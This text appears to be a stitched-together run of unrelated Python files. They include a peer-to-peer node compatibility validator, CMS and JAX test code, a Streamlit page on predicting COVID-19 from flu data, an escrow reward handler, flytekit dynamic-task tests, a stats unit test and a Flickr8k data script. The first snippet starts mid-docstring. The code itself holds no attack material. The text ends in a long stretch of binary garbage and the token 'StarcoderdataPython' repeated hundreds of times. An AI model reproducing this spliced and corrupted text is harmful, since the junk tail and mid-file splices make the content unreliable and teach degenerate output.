"1" is == peer_software_hash_list AND peer_software_hash_list[-1] == combined_hash key "2" is the ip address of the node.. key "3" is an int number of known addresses. This second message is passed to ConnectNodeValidator. the validator checks to make sure the peer is running a compatible software and also stores/updates the ip address of the node, if not already stored/updated if the peer node is NOT running a compatible software an "ntc" message ie self.not_compatible_msg is sent if peer node IS running compatible software: If the local and peer node has more than 3 ip addresses of nodes, then an end message is sent Otherwise a dictionary is sent. In this dictionary '1': True if the local node needs addresses else False '2': [list of addresses] if the peer node has 3 or less addresses else None THIRD message is received only if the local node requested for peer's address list. Third message is a list of ip addresses. length of list is <= 20. Once this is received, local node stores these addresses in address list. :param protocol: :param convo_id: :param propagatorInst: :param admin_instance: :param conn_node_validator: """ # TODO: after storing new addresses, find a way to trigger connection in which node can be connected to at # TODO: least 4 nodes IF not already connected self.known_addr = known_addr self.msg_sorter_inst = msg_sorter_inst self.connected_node_validator = conn_node_validator self.not_compatible_msg = "ntc" self.need_addr_msg = "ndr" self.need_to_receive_addr = None self.admin_instance = admin_instance self.last_msg = 'end' self.verified_msg = 'ver' self.rejected_msg = 'rej' self.send_tx_msg = 'snd' self.prop_type = 'n' self.local_convo_id = convo_id[0] self.other_convo_id = convo_id[1] # when receiving from other, the other's local id is added here self.convo_id = [self.other_convo_id, self.local_convo_id] self.end_convo = False self.received_first_msg = False self.received_tx_msg = False self.main_message = None self.propagator_inst = propagatorInst self.protocol = protocol self.end_convo_reason = None def listen(self, msg): print(f"in Networkmessagesorter.py, listen, networkmessagereceiver msg\n" f"{msg}\n") if self.end_convo is False: if isinstance(msg[-1], str) and msg[-1] in {self.verified_msg, self.rejected_msg, self.last_msg}: self.end_convo = True self.end_convo_reason = msg[-1] try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] except KeyError: pass elif self.received_first_msg is False and isinstance(msg[-1], str): # "e{adminId}" ie. "e" if msg[-1][1:] in self.admin_instance.fl.get_blacklisted_admin(): self.speak(rsp=False) else: self.speak() # expecting dict of hashes/ second message elif self.received_tx_msg is False and isinstance(msg[-1], dict): try: rsp = self.connected_node_validator( peer_node_info_dict=msg[-1], wallet_pubkey=None, q_object=None, admin_inst=self.admin_instance ).check_validity() except KeyError: # wrong tx message sent (or invalid format maybe using different version) rsp = False if rsp is True: known_addr_peer = msg[-1]["3"] known_addr_local = len(self.known_addr) if known_addr_peer > 3 and known_addr_local > 3: # no need to send self.speak(rsp=self.last_msg) else: # todo: minimize to only sending 7 addresses rsp_dict = dict() rsp_dict['1'] = self.need_to_receive_addr = known_addr_local <= 3 try: rsp_dict['2'] = list(self.known_addr) if known_addr_local <= 3 else {} except TypeError: rsp_dict['2'] = {} self.speak(rsp_dict) else: # rsp is False / non compatible software being run by peer node self.speak(self.not_compatible_msg) elif self.need_to_receive_addr is True: if isinstance(msg[-1], list): self.admin_instance.fl.update_addresses(msg[-1]) self.speak(self.last_msg) else: print("in NetworkMessageSorter, NodeValidatorReceiver, No option available") def speak(self, rsp=None): if self.end_convo is False: if self.received_first_msg is False: self.received_first_msg = True msg = self.verified_msg if rsp is True else(self.rejected_msg if rsp is False else self.send_tx_msg) self.end_convo = True if (rsp is True) or (rsp is False) else False if self.end_convo is True: try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] except KeyError: pass self.speaker(msg=msg) elif self.received_tx_msg is False: self.received_tx_msg = True if rsp == self.not_compatible_msg or isinstance(rsp, dict): if rsp == self.not_compatible_msg: try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] except KeyError: pass self.end_convo = True self.end_convo_reason = self.not_compatible_msg else: # its a dict, and therefore compatible if self.need_to_receive_addr is False: try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] self.msg_sorter_inst.validated_conn_protocols_dict[self.protocol.proto_id] = self.protocol self.msg_sorter_inst.add_protocol_to_all(protocol=self.protocol) except KeyError: pass else: pass self.speaker(msg=rsp) elif rsp == self.last_msg: # peer running compatible software self.end_convo = True try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] self.msg_sorter_inst.validated_conn_protocols_dict[self.protocol.proto_id] = self.protocol self.msg_sorter_inst.add_protocol_to_all(protocol=self.protocol) except KeyError: pass self.end_convo = True self.end_convo_reason = self.last_msg self.speaker(msg=rsp) def speaker(self, msg): self.propagator_inst.reactor_instance.callFromThread( self.protocol.transport.write, json.dumps([self.prop_type, self.convo_id, msg]).encode() ) # coding: utf-8 from zeit.cms.repository.unknown import PersistentUnknownResource from zeit.content.dynamicfolder.folder import RepositoryDynamicFolder import pkg_resources import plone.testing import transaction import zeit.cms.repository.folder import zeit.cms.repository.interfaces import zeit.cms.testing import zeit.content.cp.testing import zope.component ZCML_LAYER = zeit.cms.testing.ZCMLLayer(bases=( zeit.content.cp.testing.CONFIG_LAYER,)) ZOPE_LAYER = zeit.cms.testing.ZopeLayer(bases=(ZCML_LAYER,)) class DynamicLayer(plone.testing.Layer): defaultBases = (ZOPE_LAYER,) def __init__(self, path, files): super().__init__() self.path = path self.files = files def testSetUp(self): with zeit.cms.testing.site(self['zodbApp']): repository = zope.component.getUtility( zeit.cms.repository.interfaces.IRepository) folder = zeit.cms.repository.folder.Folder() repository['data'] = folder for name in self.files: folder[name] = PersistentUnknownResource( data=pkg_resources.resource_string( __name__, '{}{}'.format( self.path, name)).decode( 'latin-1')) dynamic = RepositoryDynamicFolder() dynamic.config_file = folder['config.xml'] repository['dynamicfolder'] = dynamic transaction.commit() LAYER = DynamicLayer(path='tests/fixtures/dynamic-centerpages/', files=[ 'config.xml', 'tags.xml', 'template.xml']) WSGI_LAYER = zeit.cms.testing.WSGILayer(bases=(LAYER,)) class FunctionalTestCase(zeit.cms.testing.FunctionalTestCase): layer = LAYER class BrowserTestCase(zeit.cms.testing.BrowserTestCase): layer = WSGI_LAYER def wsgiBrowser(self): browser = zeit.cms.testing.Browser(self.layer['wsgi_app']) browser.login('producer', 'producerpw') browser.open('http://localhost/++skin++vivi/repository/dynamicfolder') return browser def cloneArmy(self): folder = zeit.content.dynamicfolder.interfaces.ICloneArmy( self.repository['dynamicfolder']) folder.activate = True return self.wsgiBrowser() from absl.testing import absltest from absl.testing import parameterized import numpy as onp import jax.test_util import jax.numpy as np from jax import random from jax import tree_util from jax.experimental import optimizers from jax.scipy.special import logsumexp from jax.experimental.stax import softmax from jax.config import config from fax import converge from fax import test_util from fax.constrained import make_lagrangian from fax.constrained import cga_lagrange_min from fax.constrained import cga_ecp from fax.constrained import slsqp_ecp from fax.constrained import implicit_ecp from exact_pg import policy_evaluation config.update("jax_enable_x64", True) config.update('jax_disable_jit', True) # finding reward function class CGATest(jax.test_util.JaxTestCase): # @parameterized.parameters( # {'method': implicit_ecp, # 'kwargs': {'max_iter': 1000, 'lr_func': 0.01, 'optimizer': optimizers.adam}}, # {'method': cga_ecp, 'kwargs': {'max_iter': 1000, 'lr_func': 0.15, 'lr_multipliers': 0.925}}, # {'method': slsqp_ecp, 'kwargs': {'max_iter': 1000}}, # ) def test_omd(self): # def test_omd(self, method, kwargs): true_transition = np.array([[[0.7, 0.3], [0.2, 0.8]], [[0.99, 0.01], [0.99, 0.01]]]) true_reward = np.array(([[-0.45, -0.1], [0.5, 0.5]])) temperature = 1e-2 true_discount = 0.9 initial_distribution = np.ones(2)/2 policy_expert = np.array(([[0.4, 0.6], [0.4, 0.6]])) def smooth_bellman_optimality_operator(x, params): transition, reward, discount, temperature = params return reward + discount * np.einsum('ast,t->sa', transition, temperature * logsumexp((1. / temperature) * x, axis=1)) # @jax.jit def objective(x, params): del params policy = softmax((1. / temperature) * x) # [2, 2] cumulent = np.log(np.einsum('sa,ast->sat', policy, true_transition)) cumulent = np.einsum('sat,ast->sa', cumulent, true_transition) likelihood = policy_evaluation(true_transition, cumulent, true_discount, policy_expert) print("policy", policy) return initial_distribution @ likelihood # @jax.jit def equality_constraints(x, params): #reward reward_logits = params reward_hat = softmax((1./temperature)*reward_logits) params = (true_transition, reward_hat, true_discount, temperature) return smooth_bellman_optimality_operator(x, params) - x initial_values = ( np.zeros_like(true_reward), (np.zeros_like(true_reward)) ) args = {'max_iter': 1000} solution = slsqp_ecp(objective, equality_constraints, initial_values, **args) print ("solution", solution) if __name__ == "__main__": absltest.main() benlevyx/modelling-infectious-disease import streamlit as st import matplotlib.pyplot as plt import numpy as np import os import sys import pandas as pd pd.set_option('display.max_columns', None) pd.set_option('display.max_rows', None) import csv plt.rcParams.update({'font.size': 18}) import plotly.express as px # Be sure to import express from covid_flu import config def main(): st.title('Conclusion') st.write(""" #### We return to the question: can we use the flu to predict COVID-19? In our EDA, we noticed two main patterns in the flu data: **spatial** and **temporal**. As such, we attempted to exploit these patterns to see if COVID-19 might exhibit a similar-enough trend that a predictive model based on the flu data could achieve better performance than a mdoel based solely on COVID data alone. Spatial | Temporal ------- | -------- Bayesian hierarchical model | Recurrent neural networks Conditional autoregressive model (CAR) | Sequence-to-sequence models In our analyses, we found that these kinds of models were quite good at predicting the seasonal flu. We achieved very low prediction error (out of sample) for predicting seasonal flu using a seq2seq model that took advantage of the clear cyclical trends over the ten years of flu data we had. However, when it came to predicting COVID-19 by exploiting the spatiotemporal patterns in the seasonal flu, we achieved mixed results. The CAR model did not clearly outperform a simple AR(1) (autoregressive) model, which was our baseline. As well, the seq2seq models, pre-trained on flu data, did not result in plausible mid-to-long-term forecasts. Yet these COVID-19 models nonetheless revealed interesting findings that merit further exploration. For the CAR model, we found that the model consistently over-estimated the number of cases in states with higher rates of positive tests. We can tentatively interpret this to mean that, based on the spatial patterns from the flu, we would expect that states with poorer test coverage (i.e. they are not testing widely enough to see lots of negative results) actually have far more cases of COVID-19 than reported. As well, the exercise of pre-training a seq2seq model on flu and then transferring it to COVID-19 did demonstrate the power of this technique, as the best RNN model we tested for COVID-19 was the one that was trained on the flu and then fine-tuned on COVID-19. ## Next steps Much of the work done in this project has been preliminary and merits further exploration. Here are some areas that we hope to pursue in the future: * Tuning the parameters of both the hierarchical Bayesian model and the CAR model to ensure convergence * Exploring different RNN architectures that can better take into account domain knowledge about COVID-19, such as the parameter estimates from the literature * Trying other pre-trained models or external datasets that might be better suited for transfer learning with COVID-19 Thank you for your time! We hope you enjoyed reading these results as much as we enjoyed conducting this project! Stay safe and stay healthy! """)import logging import time from contracts_lib_py.keeper import Keeper from contracts_lib_py.utils import process_fulfill_condition from contracts_lib_py.web3_provider import Web3Provider logger = logging.getLogger(__name__) def fulfill_escrow_reward_condition(event, agreement_id, service_agreement, price, consumer_address, publisher_account, condition_ids, escrow_condition_id): """ :param event: AttributeDict with the event data. :param agreement_id: id of the agreement, hex str :param service_agreement: ServiceAgreement instance :param price: Asset price, int :param consumer_address: ethereum account address of consumer, hex str :param publisher_account: Account instance of the publisher :param condition_ids: is a list of bytes32 content-addressed Condition IDs, bytes32 :param escrow_condition_id: hex str the id of escrow reward condition at this `agreement_id` :return: """ if not event: logger.warning(f'`fulfill_escrow_reward_condition` got empty event: ' f'event listener timed out.') return keeper = Keeper.get_instance() if keeper.condition_manager.get_condition_state(escrow_condition_id) > 1: logger.debug( f'escrow reward condition already fulfilled/aborted: ' f'agreementId={agreement_id}, escrow reward conditionId={escrow_condition_id}' ) return logger.debug(f"release reward (agreement {agreement_id}) after event {event}.") access_id, lock_id = condition_ids[:2] logger.debug(f'fulfill_escrow_reward_condition: ' f'agreementId={agreement_id}' f'price={price}, {type(price)}' f'consumer={consumer_address},' f'publisher={publisher_account.address},' f'conditionIds={condition_ids}') assert price == service_agreement.get_price(), 'price mismatch.' assert isinstance(price, int), f'price expected to be int type, got type "{type(price)}"' time.sleep(5) keeper = Keeper.get_instance() did_owner = keeper.agreement_manager.get_agreement_did_owner(agreement_id) args = ( agreement_id, price, Web3Provider.get_web3().toChecksumAddress(did_owner), consumer_address, lock_id, access_id, publisher_account ) process_fulfill_condition(args, keeper.escrow_reward_condition, escrow_condition_id, logger, keeper, 10) fulfillEscrowRewardCondition = fulfill_escrow_reward_condition from six import moves as _six_moves from flytekit.common.tasks import sdk_dynamic as _sdk_dynamic from flytekit.common.tasks import sdk_runnable as _sdk_runnable from flytekit.sdk.tasks import dynamic_task, inputs, outputs, python_task from flytekit.sdk.types import Types from flytekit.sdk.workflow import Input, Output, workflow @inputs(in1=Types.Integer) @outputs(out_str=[Types.String], out_ints=[[Types.Integer]]) @dynamic_task def sample_batch_task(wf_params, in1, out_str, out_ints): res = ["I'm the first result"] for i in _six_moves.range(0, in1): task = sub_task(in1=i) yield task res.append(task.outputs.out1) res.append("I'm after each sub-task result") res.append("I'm the last result") res2 = [] for i in _six_moves.range(0, in1): task = int_sub_task(in1=i) yield task res2.append(task.outputs.out1) # Nested batch tasks task = sample_batch_task_sq() yield task res2.append(task.outputs.out_ints) task = sample_batch_task_sq() yield task res2.append(task.outputs.out_ints) out_str.set(res) out_ints.set(res2) @outputs(out_ints=[Types.Integer]) @dynamic_task def sample_batch_task_sq(wf_params, out_ints): res2 = [] for i in _six_moves.range(0, 3): task = sq_sub_task(in1=i) yield task res2.append(task.outputs.out1) out_ints.set(res2) @outputs(out_str=[Types.String], out_ints=[[Types.Integer]]) @dynamic_task def sample_batch_task_no_inputs(wf_params, out_str, out_ints): res = ["I'm the first result"] for i in _six_moves.range(0, 3): task = sub_task(in1=i) yield task res.append(task.outputs.out1) res.append("I'm after each sub-task result") res.append("I'm the last result") res2 = [] for i in _six_moves.range(0, 3): task = int_sub_task(in1=i) yield task res2.append(task.outputs.out1) # Nested batch tasks task = sample_batch_task_sq() yield task res2.append(task.outputs.out_ints) task = sample_batch_task_sq() yield task res2.append(task.outputs.out_ints) out_str.set(res) out_ints.set(res2) @inputs(in1=Types.Integer) @outputs(out1=Types.String) @python_task def sub_task(wf_params, in1, out1): out1.set("hello {}".format(in1)) @inputs(in1=Types.Integer) @outputs(out1=[Types.Integer]) @python_task def int_sub_task(wf_params, in1, out1): wf_params.stats.incr("int_sub_task") out1.set([in1, in1 * 2, in1 * 3]) @inputs(in1=Types.Integer) @outputs(out1=Types.Integer) @python_task def sq_sub_task(wf_params, in1, out1): out1.set(in1 * in1) @inputs(in1=Types.Integer) @outputs(out_str=[Types.String]) @dynamic_task def no_future_batch_task(wf_params, in1, out_str): out_str.set(["res1", "res2"]) def manual_assign_name(): pass @inputs(task_input_num=Types.Integer) @outputs(out=Types.Integer) @dynamic_task def dynamic_wf_task(wf_params, task_input_num, out): wf_params.logging.info("Running inner task... yielding a code generated sub workflow") input_a = Input(Types.Integer, help="Tell me something") node1 = sq_sub_task(in1=input_a) MyUnregisteredWorkflow = workflow( inputs={"a": input_a}, outputs={"ooo": Output(node1.outputs.out1, sdk_type=Types.Integer, help="This is an integer output")}, nodes={"node_one": node1}, ) setattr(MyUnregisteredWorkflow, "auto_assign_name", manual_assign_name) MyUnregisteredWorkflow._platform_valid_name = "unregistered" unregistered_workflow_execution = MyUnregisteredWorkflow(a=task_input_num) out.set(unregistered_workflow_execution.outputs.ooo) def test_batch_task(): assert isinstance(sample_batch_task, _sdk_runnable.SdkRunnableTask) assert isinstance(sample_batch_task, _sdk_dynamic.SdkDynamicTask) assert isinstance(sample_batch_task, _sdk_dynamic.SdkDynamicTaskMixin) expected = { "out_str": [ "I'm the first result", "hello 0", "I'm after each sub-task result", "hello 1", "I'm after each sub-task result", "hello 2", "I'm after each sub-task result", "I'm the last result", ], "out_ints": [[0, 0, 0], [1, 2, 3], [2, 4, 6], [0, 1, 4], [0, 1, 4]], } res = sample_batch_task.unit_test(in1=3) assert expected == res def test_no_future_batch_task(): expected = {"out_str": ["res1", "res2"]} res = no_future_batch_task.unit_test(in1=3) assert expected == res def test_dynamic_workflow(): res = dynamic_wf_task.unit_test(task_input_num=2) dynamic_spec = res["futures.pb"] assert len(dynamic_spec.nodes) == 1 assert len(dynamic_spec.subworkflows) == 1 assert len(dynamic_spec.tasks) == 1 @inputs(task_input_num=Types.Integer) @outputs(out=Types.Integer) @dynamic_task def nested_dynamic_wf_task(wf_params, task_input_num, out): wf_params.logging.info("Running inner task... yielding a code generated sub workflow") # Inner workflow input_a = Input(Types.Integer, help="Tell me something") node1 = sq_sub_task(in1=input_a) MyUnregisteredWorkflowInner = workflow( inputs={"a": input_a}, outputs={"ooo": Output(node1.outputs.out1, sdk_type=Types.Integer, help="This is an integer output")}, nodes={"node_one": node1}, ) setattr(MyUnregisteredWorkflowInner, "auto_assign_name", manual_assign_name) MyUnregisteredWorkflowInner._platform_valid_name = "unregistered" # Output workflow input_a = Input(Types.Integer, help="Tell me something") node1 = MyUnregisteredWorkflowInner(a=task_input_num) MyUnregisteredWorkflowOuter = workflow( inputs={"a": input_a}, outputs={"ooo": Output(node1.outputs.ooo, sdk_type=Types.Integer, help="This is an integer output")}, nodes={"node_one": node1}, ) setattr(MyUnregisteredWorkflowOuter, "auto_assign_name", manual_assign_name) MyUnregisteredWorkflowOuter._platform_valid_name = "unregistered" unregistered_workflow_execution = MyUnregisteredWorkflowOuter(a=task_input_num) out.set(unregistered_workflow_execution.outputs.ooo) def test_nested_dynamic_workflow(): res = nested_dynamic_wf_task.unit_test(task_input_num=2) dynamic_spec = res["futures.pb"] assert len(dynamic_spec.nodes) == 1 assert len(dynamic_spec.subworkflows) == 2 assert len(dynamic_spec.tasks) == 1 @inputs(task_input_num=Types.Integer) @dynamic_task def dynamic_wf_no_outputs_task(wf_params, task_input_num): wf_params.logging.info("Running inner task... yielding a code generated sub workflow") input_a = Input(Types.Integer, help="Tell me something") node1 = sq_sub_task(in1=input_a) MyUnregisteredWorkflow = workflow(inputs={"a": input_a}, outputs={}, nodes={"node_one": node1}) setattr(MyUnregisteredWorkflow, "auto_assign_name", manual_assign_name) MyUnregisteredWorkflow._platform_valid_name = "unregistered" unregistered_workflow_execution = MyUnregisteredWorkflow(a=task_input_num) yield unregistered_workflow_execution def test_dynamic_workflow_no_outputs(): res = dynamic_wf_no_outputs_task.unit_test(task_input_num=2) dynamic_spec = res["futures.pb"] assert len(dynamic_spec.nodes) == 1 assert len(dynamic_spec.subworkflows) == 1 assert len(dynamic_spec.tasks) == 1 # interesting_lines.py def interesting_lines(f): for line in f: if line.startswith("#"): continue line = line.strip() if not line: # Empty line continue yield line with open('myconfig.ini') as f: for line in interesting_lines(f): print(line) ezorigo/lambdata """ This is the test file for my stats tools functions run this in terminal with python stats_tools_test.py optionally you can do verbose mode by adding -v to that command """ import unittest import numpy as np from stats_tools import mean, mode, median, variance, stddev, coeffvar list1 = [1, 1, 1, 2, 3, 3, 6, 7, 8, 9] class StatsTests(unittest.TestCase): """ Test stats_tools functions """ def test_mean(self): """ test mean() """ self.assertEqual(float(mean(list1)), np.mean(list1)) def test_mode(self): """ test mode() """ self.assertEqual(mode(list1), 1) def test_median(self): """ test median() """ self.assertEqual(median(list1), np.median(list1)) def test_variance(self): """ test variance() and variance(sample=False) """ self.assertEqual(variance(list1, sample=False), np.var(list1)) self.assertEqual(variance(list1), np.var(list1, ddof=1)) def test_stddev(self): """ test stddev() and stddev(samepl=False) """ self.assertEqual(stddev(list1, sample=False), np.std(list1)) self.assertEqual(stddev(list1), np.std(list1, ddof=1)) def test_coeffvar(self): """ test coeffvar() and coeffvar(sample=False) """ self.assertEqual(coeffvar(list1, sample=False), np.std(list1) / np.mean(list1)) self.assertEqual(coeffvar(list1), np.std(list1, ddof=1) / np.mean(list1)) if __name__ == '__main__': unittest.main() #!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Created on Tue May 2 20:07:35 2017 @author: belter """ import scipy import json import os from collections import defaultdict dataset = 'flickr8k' dataset_root = r'/media/sf_vm_share_folder/neuraltalk/data/flickr8k' features_path = os.path.join(dataset_root, 'vgg_feats.mat') dataset_path = os.path.join(dataset_root, 'dataset.json') features_struct = scipy.io.loadmat(features_path) dataset = json.load(open(dataset_path, 'r')) split = defaultdict(list) for img in dataset['images']: split[img['split']].append(img) with open(os.path.join(dataset_root, 'dataset_2.json'), 'w') as file_handle: file_handle.write(json.dumps(dataset, indent = 2)) &9L_r������� 0CVi|������':M`s������� 1DWj}������(;Nat������� 2EXk~������)<Obu�������  3FYl������*=Pcv������� ! 4 G Z m � � � � � � �   + > Q d w � � � � � � �  " 5 H [ n � � � � � � �   , ? R e x � � � � � � �  # 6 I \ o � � � � � � � -@Sfy�������$7J]p�������.ATgz�������%8K^q������� /BUh{������&9L_r������� 0CVi|������':M`s������� 1DWj}������(;Nat������� 2EXk~������)<Obu�������  3FYl������*=Pcv�������!4GZm�������+>Qdw�������"5H[n�������,?Rex������� # 6 I \ o � � � � � � � !!-!@!S!f!y!�!�!�!�!�!�!�!"$"7"J"]"p"�"�"�"�"�"�"�"##.#A#T#g#z#�#�#�#�#�#�#�#$%$8$K$^$q$�$�$�$�$�$�$�$ %%/%B%U%h%{%�%�%�%�%�%�%&&&&9&L&_&r&�&�&�&�&�&�&�& ''0'C'V'i'|'�'�'�'�'�'�'(('(:(M(`(s(�(�(�(�(�(�(�( ))1)D)W)j)})�)�)�)�)�)�)**(*;*N*a*t*�*�*�*�*�*�*�* ++2+E+X+k+~+�+�+�+�+�+�+,,),<,O,b,u,�,�,�,�,�,�,�, - -3-F-Y-l--�-�-�-�-�-�-..*.=.P.c.v.�.�.�.�.�.�.�./!/4/G/Z/m/�/�/�/�/�/�/�/00+0>0Q0d0w0�0�0�0�0�0�0�01"151H1[1n1�1�1�1�1�1�1�122,2?2R2e2x2�2�2�2�2�2�2�23#363I3\3o3�3�3�3�3�3�3�344-4@4S4f4y4�4�4�4�4�4�4�45$575J5]5p5�5�5�5�5�5�5�566.6A6T6g6z6�6�6�6�6�6�6�67%787K7^7q7�7�7�7�7�7�7�7 88/8B8U8h8{8�8�8�8�8�8�899&999L9_9r9�9�9�9�9�9�9�9 ::0:C:V:i:|:�:�:�:�:�:�:;;';:;M;`;s;�;�;�;�;�;�;�; <<1<D<W<j<}<�<�<�<�<�<�<==(=;=N=a=t=�=�=�=�=�=�=�= >>2>E>X>k>~>�>�>�>�>�>�>??)?CQCdCwC�C�C�C�C�C�C�CD"D5DHD[DnD�D�D�D�D�D�D�DEE,E?EREeExE�E�E�E�E�E�E�EF#F6FIF\FoF�F�F�F�F�F�F�FGG-G@GSGfGyG�G�G�G�G�G�G�GH$H7HJH]HpH�H�H�H�H�H�H�HII.IAITIgIzI�I�I�I�I�I�I�IJ%J8JStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdata